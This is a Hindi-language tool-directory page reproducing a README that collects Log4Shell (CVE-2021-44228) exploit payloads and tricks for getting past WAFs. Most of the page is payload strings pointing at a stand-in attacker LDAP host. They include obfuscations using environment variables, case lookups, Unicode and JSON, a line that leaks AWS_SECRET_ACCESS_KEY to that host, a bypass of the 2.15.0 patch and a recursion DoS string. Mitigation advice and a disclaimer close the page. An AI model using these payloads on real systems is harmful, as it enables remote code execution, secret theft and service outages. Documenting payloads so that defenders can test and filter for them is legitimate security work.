Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228-PoC-log4j-bypass-words — 🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J जावा एक्सप्लॉइट - WAF बायपास तरकीबें | Kitploit
उपकरण/GitHubGitHub/puliczek/cve-2021-44228-poc-log4j-bypass-words
पेलोड जनरेशनभेद्यता विश्लेषणशोषणआईडीएस/आईपीएस से बचनावेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubpuliczek/cve-2021-44228-poc-log4j-bypass-words

CVE-2021-44228-PoC-log4j-bypass-words

🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J जावा एक्सप्लॉइट - WAF बायपास तरकीबें

रिपॉजिटरी देखें
9501344 साल पहलेKitploit द्वारा समीक्षित
🤝 अपना समर्थन दिखाएँ - यदि आपको सामग्री पसंद आई हो तो ⭐️ दें | ट्विटर पर साझा करें | मेरा अनुसरण करें

🐱‍💻 ✂️ 🤬 LOG4J Java शोषण - WAF और पैच बायपास ट्रिक्स

📝 विवरण

CVE-2021-44228 निम्न पर काम करता है:

log4j: 2.0 <= Apache log4j <= 2.14.1

Java संस्करण जो पहले से पैच किए गए हैं: 6u211+, 7u201+, 8u191+, 11.0.1+।

Windows Defender ने उन .java फ़ाइलों को हटाना शुरू कर दिया है जिनमें jndi:ldap:.... शामिल है।

सरल हमलावर स्क्रिप्ट (संभावित RCE):

${jndi:ldap://somesitehackerofhell.com/z}

WAF या डेवलपर्स ने निम्नलिखित वाक्यांशों को ब्लॉक करना शुरू कर दिया है:

  • "ldap:"
  • "jndi:"

एप्लिकेशन को सुरक्षित करने के लिए।

हालांकि, हमलावर इनमें से किसी एक तकनीक का उपयोग करके इसे बायपास कर सकता है:

1. सिस्टम पर्यावरण चर

${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}

Apache Log4j 2 दस्तावेज़ से: ${env:ENV_NAME:-default_value}

यदि कोई ENV_NAME सिस्टम पर्यावरण चर नहीं है, तो :- के बाद के टेक्स्ट का उपयोग करें।

हमलावर ENV_NAME के बजाय कोई भी नाम उपयोग कर सकता है, लेकिन उसका अस्तित्व में नहीं होना चाहिए।

या हैकर पर्यावरण चर पढ़ सकता है, उदाहरण के लिए AWS_SECRET_ACCESS_KEY:

${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}

और अधिक रहस्य देखें 🦄🔒 पर्यावरण चर में रहस्यों की अद्भुत सूची 🖥️

आप अपने सिस्टम पर्यावरण चरों की जाँच कर सकते हैं:

  • विंडोज पर PowerShell में चलाएँ: dir env:
  • लिनक्स/मैकओएस पर टर्मिनल में चलाएँ: printenv या env

2. लोअर या अपर लुकअप

${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}

${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://somesitehackerofhell.com/z}

लोअर लुकअप LowerLookup पारित किए गए तर्क को लोअर केस में परिवर्तित करता है। संभवतः मान नेस्टेड लुकअप का परिणाम होगा।

${lower:<text>}

अपर लुकअप UpperLookup पारित किए गए तर्क को अपर केस में परिवर्तित करता है। संभवतः मान नेस्टेड लुकअप का परिणाम होगा।

${upper:<text>}


3. "::-" नोटेशन

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}


4. अपर के साथ अमान्य यूनिकोड वर्ण

${jnd${upper:ı}:ldap://somesitehackerofhell.com/z}

ı को i में बदल दिया गया


5. सिस्टम गुण

${jnd${sys:SYS_NAME:-i}:ldap:/somesitehackerofhell.com/z}

यदि कोई SYS_NAME सिस्टम गुण नहीं है, तो :- के बाद के टेक्स्ट का उपयोग करें।


6. ":-" नोटेशन

${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://somesitehackerofhell.com/z}


7. दिनांक

${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://somesitehackerofhell.com/z}

Java दिनांक स्वरूपण YYYY को 2021 में बदलता है, लेकिन यह 'YYYY' को YYYY या 'j' को j में बदलता है।


8. HTML URL एन्कोडिंग

अक्षरों को बदलें:

  • } को %7D से
  • { को %7B से
  • $ को %24 से

आप यहाँ और पढ़ सकते हैं HTML URL एन्कोडिंग संदर्भ


9. अस्तित्वहीन लुकअप

${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://somesitehackerofhell.com/z}

यह लुकअप के अस्तित्व की पुष्टि नहीं करता है और बस खुशी-खुशी डिफ़ॉल्ट का मूल्यांकन करता है।


10. पॉलीमॉर्फिक (JSON REST API अनुरोध)


root@kitploit:~
{
    "one-${jnd${a":"a:-i}:ld${",
    "two":"o:-a}p://somesitehackerofhell.com/z}
}

"अलग-अलग ये कुंजियाँ और मान कोई हमला नहीं दर्शाते हैं। लेकिन ये सब मिलकर एक हमला है और यह हमला JSON पार्सर के कारण पहचान प्रणालियों के लिए पारदर्शी है।" और पढ़ें...


11. यूनिकोड वर्ण (JSON REST API अनुरोध)

${\u006a\u006e\u0064\u0069:ldap://somesitehackerofhell.com/z}

कुछ वर्णों को यूनिकोड में बदलें।

यूनिकोड कन्वर्टर ऑनलाइन


12. # के साथ ट्रिक (log4j 2.15 पर काम करता है)

${jndi:ldap://127.0.0.1#somesitehackerofhell.com/z}

Log4J 2.15.0 में allowedLdapHost और allowedClasses जांच को बायपास करता है। java.net.URI getHost() विधि वास्तविक होस्ट के रूप में # से पहले का मान लौटाती है। लेकिन JNDI/LDAP रिज़ॉल्वर दुर्भावनापूर्ण LDAP सर्वर से कनेक्ट करने का प्रयास करते हुए पूर्ण होस्टनाम स्ट्रिंग को हल करेगा।

और पढ़ें...


13. DoS हमला (log4j 2.8 - 2.16 पर काम करता है - CVE-2021-45105 )

${${::-${::-$${::-j}}}}

यदि निम्नलिखित स्ट्रिंग पर किसी भी कारण से स्ट्रिंग प्रतिस्थापन का प्रयास किया जाता है, तो यह अनंत पुनरावृत्ति को ट्रिगर करेगा, और एप्लिकेशन क्रैश हो जाएगा।

और पढ़ें...


14. वितरण चैनल के रूप में PDF।

CVE-2021-44228 का शोषण करने के लिए विशेष pdf फ़ाइल बनाएं

PDF उदाहरण

PDF फ़ाइल प्राप्त करें और और पढ़ें...

परीक्षण

प्रविष्टि का परीक्षण करने के लिए आप इसका उपयोग कर सकते हैं:

  • https://canarytokens.org/generate - टोकन Log4Shell चुनें (प्रविष्टि सूचना ईमेल या वेबहुक द्वारा भेजी जाएगी), जनरेट करें और somesitehackerofhell.com/z को बदलें।
  • https://dnslog.cn/ - सबडोमेन जनरेट करें और somesitehackerofhell.com/z को बदलें।

✨ CVE-2021-44228 से बचाव का सबसे अच्छा समाधान

tl;dr log4j-2.17.1 या बाद के संस्करण में अपडेट करें।

Log4j 1.x शमन: Log4j 1.x में Lookups नहीं हैं इसलिए जोखिम कम है। Log4j 1.x का उपयोग करने वाले एप्लिकेशन केवल तब इस हमले के लिए संवेदनशील होते हैं जब वे अपने कॉन्फ़िगरेशन में JNDI का उपयोग करते हैं। इस भेद्यता के लिए एक अलग CVE (CVE-2021-4104) दर्ज किया गया है। शमन के लिए: अपने लॉगिंग कॉन्फ़िगरेशन का ऑडिट करें ताकि यह सुनिश्चित हो सके कि इसमें कोई JMSAppender कॉन्फ़िगर नहीं है। JMSAppender के बिना Log4j 1.x कॉन्फ़िगरेशन इस भेद्यता से प्रभावित नहीं होते हैं।

Log4j 2.x शमन: नीचे दिए गए शमन तकनीकों में से एक को लागू करें।

  • Java 8 (या बाद के) उपयोगकर्ताओं को रिलीज़ 2.17.1 में अपग्रेड करना चाहिए।
  • Java 7 की आवश्यकता वाले उपयोगकर्ताओं को रिलीज़ 2.12.4 में अपग्रेड करना चाहिए जब यह उपलब्ध हो (कार्य प्रगति पर है, जल्द ही उपलब्ध होने की उम्मीद है)।
  • अन्यथा, क्लासपाथ से JndiLookup क्लास को हटा दें: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class और ${ctx:loginId} या $${ctx:loginId} जैसे कॉन्टेक्स्ट Lookups के संदर्भ हटा दें जहाँ वे एप्लिकेशन के बाहरी स्रोतों जैसे HTTP हेडर या उपयोगकर्ता इनपुट से उत्पन्न होते हैं।

ध्यान दें कि केवल log4j-core JAR फ़ाइल इस भेद्यता से प्रभावित है। केवल log4j-api JAR फ़ाइल का उपयोग करने वाले एप्लिकेशन (log4j-core JAR फ़ाइल के बिना) इस भेद्यता से प्रभावित नहीं होते हैं।

स्रोत और और पढ़ें...

इसे सुरक्षित रखें!

🤝 अपना समर्थन दिखाएँ

🤝 अपना समर्थन दिखाएँ - यदि आपको सामग्री या मीम पसंद आई हो तो ⭐️ दें | ट्विटर पर साझा करें | मेरा अनुसरण करें

log2

📝 उपयोगी लिंक

  • Apache Log4j 2 v. 2.15.0 - उपयोगकर्ता मार्गदर्शिका
  • लोअर/अपर बायपास का संभावित पहला प्रकाशन
  • CVE-2021-44228 (Apache Log4j रिमोट कोड निष्पादन)
  • HTML URL एन्कोडिंग संदर्भ
  • GitHub ने CVE-2021-44228 की समीक्षा की - Log4j में रिमोट कोड इंजेक्शन
  • Apache Log4j सुरक्षा भेद्यताएँ
  • प्रोग्राम log4j-detector - आपके फ़ाइल-सिस्टम पर किसी भी एप्लिकेशन के भीतर Log4J संस्करणों का पता लगाता है जो CVE-2021-44228 और CVE-2021-45046 के लिए संवेदनशील हैं
  • पॉलीमॉर्फिक Log4J शोषण जो एक मान्य JSON REST API अनुरोध है
  • डेटा प्रारूप अस्पष्टता का उपयोग करके NGFW/WAFs को बायपास करना
  • LOG4J2-3230 कुछ स्ट्रिंग्स अनंत पुनरावृत्ति का कारण बन सकती हैं
  • Log4J 2.15.0 में allowedLdapHost और allowedClasses जांच को बायपास करने का PoC यहाँ है
  • 🦄🔒 पर्यावरण चर में रहस्यों की अद्भुत सूची 🖥️
  • वितरण चैनल के रूप में PDF का उपयोग करके CVE-2021-44228 का शोषण - PoC

🙌 योगदान के लिए उपयोगकर्ताओं का धन्यवाद

  • सभी योगदानकर्ता
  • Whatsec अधिक बायपास उदाहरणों के लिए
  • manjula-aw सुरक्षा अनुभाग में सुधार के लिए
  • juliusmusseau एक और बायपास उदाहरण के लिए

✔️ अस्वीकरण

यह परियोजना केवल शैक्षिक उद्देश्यों के लिए उपयोग की जा सकती है। बिना पूर्व अनुमति के लक्षित प्रणालियों के विरुद्ध इस सॉफ़्टवेयर का उपयोग करना अवैध है, और इस सॉफ़्टवेयर के दुरुपयोग से होने वाली किसी भी क्षति की जिम्मेदारी लेखक की नहीं होगी।

मैं CVE-2021-44228 और कुछ बायपास का लेखक नहीं हूँ।

टूल डाउनलोड करें